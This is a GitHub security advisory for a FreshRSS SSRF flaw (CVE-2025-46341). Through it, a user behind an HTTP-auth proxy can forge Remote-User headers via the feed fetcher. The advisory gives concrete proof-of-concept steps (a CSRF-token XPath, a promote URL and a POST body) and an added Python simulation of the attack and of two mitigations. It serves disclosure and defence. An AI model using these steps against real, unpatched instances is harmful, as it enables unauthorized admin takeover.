Privilege escalation via SSRF when using HTTP auth · Advisory · FreshRSS/FreshRSS · GitHub
Privilege escalation via SSRF when using HTTP auth
Severity: High
Package: No package listed
Affected versions: <=1.26.1
Patched versions: 1.26.2

CVSS v3.1 base score: 7.1 / 10 (High; computed from the vector string below)
CVSS v3 base metrics
Attack vector: Network
Attack complexity: High
Privileges required: Low
User interaction: None
Scope: Changed
Confidentiality: High
Integrity: Low
Availability: None
Vector string: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N
CVE ID: CVE-2025-46341
Weaknesses
CWE-918: Server-Side Request Forgery (SSRF)
The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.

Credits
Inverle (reporter)
Summary
When the server uses HTTP auth via a reverse proxy, it is possible to impersonate any user through the Remote-User header or the X-WebAuth-User header by making specially crafted requests via the add-feed functionality and obtaining the CSRF token through XPath scraping.

Details
The attacker has to know the IP address of the proxied FreshRSS instance and the admin's username, and must already have an account on the instance.
An example of a vulnerable server configuration is Authentik with the Proxy provider in use, passing the Remote-User or X-WebAuth-User header to the FreshRSS instance. Note that the attack requires the IP address under which the FreshRSS instance itself is running to be included in the TRUSTED_PROXY environment variable. This happens when both Authentik and FreshRSS are running under Docker.

PoC
Let's say that the proxy is running under https://192.168.91.132:80 and the FreshRSS instance is at https://192.168.91.132:8080.
An external attacker cannot spoof the Remote-User header from their own IP address, because that address is not included in the TRUSTED_PROXY environment variable. The FreshRSS instance's own IP address is included, however, so the request has to be made by FreshRSS itself. The steps are as follows.
First, obtain the CSRF token: add a feed whose URL points at the FreshRSS instance and whose request carries the Remote-User header set to the admin's username (here akadmin), and scrape the token with this XPath:
//*[@id="mark-read-aside"]/input/@value
(screenshot not captured) If no error occurred, the token appears as an entry in our feed.
Next, promote ourselves using the CSRF token. The feed URL is
https://192.168.91.132:8080/i/?c=user&a=manage&username=example
the XPath is
//*[@id="dialogMsg"]
and the POST body is
_csrf=[token]&action=promote
(screenshot not captured) After the request is sent, we observe that we are now admin.
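The chain from Details and PoC, modeled end to end as an added example (Python written for this page, not FreshRSS code): a stand-in instance that honours Remote-User or X-WebAuth-User only when the TCP peer is in its trusted-proxy list, a feed fetcher that requests any URL from the instance's own address, and the attacker's two feed definitions. The proxy address 192.168.91.1, the page markup, the promote endpoint's behaviour and the feed-definition fields (extra headers, POST body, XPath) are assumptions; the page does not say how the real add-feed form carries them. The same chain is then run against two configurations an operator can check for: a TRUSTED_PROXY list that omits the instance's own address, and a fetcher that refuses feed URLs pointing at the instance. Neither is presented here as the 1.26.2 fix.

```python
# Added illustration of the advisory's trust chain; not FreshRSS code.
# Assumed: the proxy's address, the page markup, the promote endpoint's
# behaviour, and that a feed definition can carry extra headers and a body.
from dataclasses import dataclass, field
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit
import secrets

PROXY_IP = "192.168.91.1"       # assumed address of the Authentik proxy container
FRESHRSS_IP = "192.168.91.132"  # address the advisory gives for the FreshRSS instance


@dataclass
class Instance:
    """Stand-in for a FreshRSS instance using HTTP auth behind a proxy."""
    trusted_proxies: set
    users: set = field(default_factory=lambda: {"akadmin", "example"})
    admins: set = field(default_factory=lambda: {"akadmin"})
    csrf: dict = field(default_factory=dict)

    def user_from_headers(self, remote_addr, headers):
        # The user header is honoured only when the TCP peer is a trusted proxy.
        if remote_addr not in self.trusted_proxies:
            return None
        for name in ("Remote-User", "X-WebAuth-User"):
            if headers.get(name) in self.users:
                return headers[name]
        return None

    def handle(self, remote_addr, url, headers, body=None):
        user = self.user_from_headers(remote_addr, headers)
        if user is None:
            return 401, "login required"
        token = self.csrf.setdefault(user, secrets.token_hex(8))
        q = parse_qs(urlsplit(url).query)
        if q.get("c") == ["user"] and q.get("a") == ["manage"] and body is not None:
            form = parse_qs(body)
            if user not in self.admins or form.get("_csrf") != [token]:
                return 403, '<p id="dialogMsg">forbidden</p>'
            if form.get("action") == ["promote"]:
                self.admins.add(q["username"][0])
                return 200, '<p id="dialogMsg">user promoted</p>'
        # Every rendered page carries the session's CSRF token where the PoC's XPath looks.
        return 200, ('<aside id="mark-read-aside"><input type="hidden" '
                     f'name="_csrf" value="{token}"></aside>')


class MarkReadAsideToken(HTMLParser):
    """Stdlib equivalent of the XPath //*[@id="mark-read-aside"]/input/@value."""
    def __init__(self):
        super().__init__()
        self.inside, self.value = False, None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if a.get("id") == "mark-read-aside":
            self.inside = True
        elif self.inside and tag == "input" and self.value is None:
            self.value = a.get("value")

    def handle_endtag(self, tag):
        if tag == "aside":
            self.inside = False


def scrape_token(html):
    parser = MarkReadAsideToken()
    parser.feed(html)
    return parser.value


def fetch_feed(instance, url, headers, body=None, block_self=False):
    """Model of the feed fetcher: the outbound request leaves from FRESHRSS_IP."""
    if block_self and urlsplit(url).hostname == FRESHRSS_IP:
        return 0, "refused: feed URL points at this instance"
    return instance.handle(FRESHRSS_IP, url, headers, body)


def run_poc(instance, block_self=False):
    """User 'example' adds the two feeds from the PoC; returns True if promoted to admin."""
    spoof = {"Remote-User": "akadmin"}
    _, page = fetch_feed(instance, f"https://{FRESHRSS_IP}:8080/i/", spoof, block_self=block_self)
    token = scrape_token(page)
    if token is None:
        return False
    fetch_feed(instance, f"https://{FRESHRSS_IP}:8080/i/?c=user&a=manage&username=example",
               spoof, body=f"_csrf={token}&action=promote", block_self=block_self)
    return "example" in instance.admins


if __name__ == "__main__":
    vuln = Instance(trusted_proxies={PROXY_IP, FRESHRSS_IP})  # own address trusted, as in the advisory
    print("own address in TRUSTED_PROXY:", run_poc(vuln))
    print("only the proxy trusted:", run_poc(Instance(trusted_proxies={PROXY_IP})))
    print("fetcher refuses self-targeted URLs:",
          run_poc(Instance(trusted_proxies={PROXY_IP, FRESHRSS_IP}), block_self=True))
```

Running the file prints the three outcomes. A requester whose peer address is outside the trusted list gets no user from the headers no matter what it sends, which is why the fetcher, not the attacker's own client, has to carry the spoofed header.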
Impact
An attacker can send specially crafted requests to gain unauthorized access to internal services. This can also lead to privilege escalation, as in the demonstrated scenario; instances that have set up OIDC are not affected by the privilege escalation.